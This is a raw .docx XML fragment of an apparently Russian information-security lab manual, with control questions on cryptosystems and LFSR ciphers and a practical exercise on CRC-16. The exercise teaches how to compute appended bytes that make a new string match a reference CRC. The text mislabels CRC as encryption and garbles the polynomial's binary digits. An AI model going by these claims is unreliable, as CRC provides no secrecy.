        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Перечислите этапы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>построения системы защиты информации.</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что такое ключ?</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pacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что определяет криптостойкость и характеристикой чего она является?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.           Опишите процесс шифрования линейным регистром с обратными связями</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>3.           Опишите процесс дешифрования линейным регистром с обратными связями</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>4.           Выполните шифрования линейным регистром с обратными связями на оценку «хорошо»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>4.           Выполните шифрования линейным регистром с обратными связями на оценку «отлично»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Содержание отчета и его форма</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выполнении практической части оценка выставляется в зависимости от количества допущенных ошибок. Индивидуальные задания для тренировочного и контрольного тестирования выдаются системой автоматически по мере обращения за ними.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="l6"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа №6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Изучение CRC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Цель работы:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> изучить способ шифрования информации с использованием CRC-кодов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Теоретическое обоснование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Контрольные суммы и CRC-коды применяются для контроля целого кадра (или его нескольких полей). Для них в кадре определяется специальное поле для контрольного кода, обычно 1, 2 или 4 байта. Контрольная сумма применяется для кадров длиной кратных байту (слову). CRC-контроль может выполняться над цепочками бит произвольной длины (не обязательно кратной байту).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Контрольная сумма (checksum) обычно вычисляется как дополнение суммы всех байт кадра до нуля (или FF — всех двоичных единиц). Суммирование выполняется по модулю, соответствующему разрядности поля контрольного кода. При этом приемник, просуммировав по тому же модулю все байты или слова кадра, включая контрольные коды, должен получить то же число (0 или FF). Контрольная сумма является самым простым способом контроля кадра, вероятность обнаружения ошибок с ее помощью достигает 99,6%. С увеличением длины кадра при той же длине контрольного кода вероятность обнаружения ошибок падает.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Избыточный циклический контроль CRC (Cyclic Redundancy Check) использует более сложный алгоритм. Выбирается порождающий полином разрядности большей, чем поле контрольного кода. Для 16-битного CRC рекомендуется Х16+Х12+Х5+1 (lOOOlOOOOOOlOOOOlb). Кадр (как длинное двоичное число) с обнуленным полем CRC делится на полином, и остаток этого деления (по модулю разрядности поля CRC) помещается в поле CRC передаваемых данных. Приемник делит принятый кадр (вместе с полем CRC) на тот же полином и сравнивает остаток от деления с некоторым эталоном (нулем или иным числом). Если они совпали, принимается решение о корректности кадра. 16-битный CRC позволяет обнаруживать одиночные, двукратные и все ошибки с нечетной кратностью, а также многие групповые ошибки (искажение группы соседних бит). Вероятность обнаружения ошибок достигает 99,9984%. 16-разрядный CRC применяется во многих сетевых протоколах. Операция деления может выполняться аппа-ратно по мере последовательного приема бит с помощью регистров сдвига с обратной связью (функция «исключающее ИЛИ» используемых бит порождающего полинома и входных данных).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Развитием идеи CRC является ЕСС-контроль (Error Correction Code), позволяющий не только обнаруживать, но и исправлять некоторые ошибки. В сетях ЕСС практически не применяется, поскольку требует большей избыточности (он применяется в устройствах хранения, где в случае ошибки «переспросить» не у кого).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Методика и порядок выполнения работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1. Выполнение практической части в режиме «Без оценки».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Нажмите кнопку «Старт».  Будет сформировано задание:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">строка, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> которой надо является эталонным «Исходная строка (Эталонное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t>)»;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">строка («Новая строка»), которая после добавления к ней двух вычисленных байт будет иметь тоже </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что и «Эталонное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t>»;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">полином (на основе которого рассчитывается значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> данных строк);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>таблица CRC (Вычисленная по полиному).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Необходимо вычислить 4 не вычисленных значения в таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Вычисление элемента в таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>переверните (прочитать справа – налево в двоичном виде) полином и запомните(запишите) получившееся значение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>переверните номер рассчитываемой строки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>дополните его 8-ю нулями</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">если в 15 позиции справа (считая с 0) 0, то сдвиньте влево нулем на один бит, если 1, то сдвиньте и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с перевернутым полиномом</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>повторить предыдущий пункт еще 7 раз (всего 8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>возьмите младшие 16 бит и переверните их, как и в начале</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>переведите получившееся значение в 16-й вид</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">получившееся значение и есть значение таблицы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Возьмите первый байт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исходной строки и найдите в таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строку, в которой значение начинается с этого байта (найти можно с помощью поиска, если поиск не показывает строку, то необходимо выполнить пункт 1.1) запомните (запишите) номер строки, в которой есть это значение и второй байт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 Вычислите значение, равное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> второго байта найденного в 1.2 и второго байта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> «Исходной строки».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.4 По полученному значению найдите строку в таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запомните номер строки и второй байт в значении таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.5 Значение второго байта, который надо добавить в поле «Дополнительные байты» равно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> первого байта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в «Новой строки» со вторым байтом полученным в 1.4 и с номером строки полученным в 1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Значение первого байта равно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> второго байта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в «Новой строки» с номером строки полученным в 1.4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.6 Введите полученные байты в поле для редактирования «Дополнительные байты» и нажмите кнопку «Результат», если вы выполнили все расчеты правильно и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строк:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>«Исходная строка» и «Новая строка» совпадут, то будет выдано сообщение «Задание выполнено», если нет, будет выдано сообщение «Задание не выполнено».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2. Выполнение практической части работы в режиме «С оценкой».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполняется, так же как и в режиме «Без оценки» но в конце выполнения практической части будет выставлена оценка исходя из количества допущенных ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t> </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jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Нарисуйте обобщенную схему криптосистемы.</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Нарисуйте о</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>бобщенную схему асимметричной криптосистемы с открытым ключом.</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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Приведите пример шифрования с помощью триграмм и биграмм.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Перечислите требования к шифрам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что такое криптоанализ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Выполните процесс шифрования на оценку хорошо</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Выполните процесс шифрования на оценку отлично</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
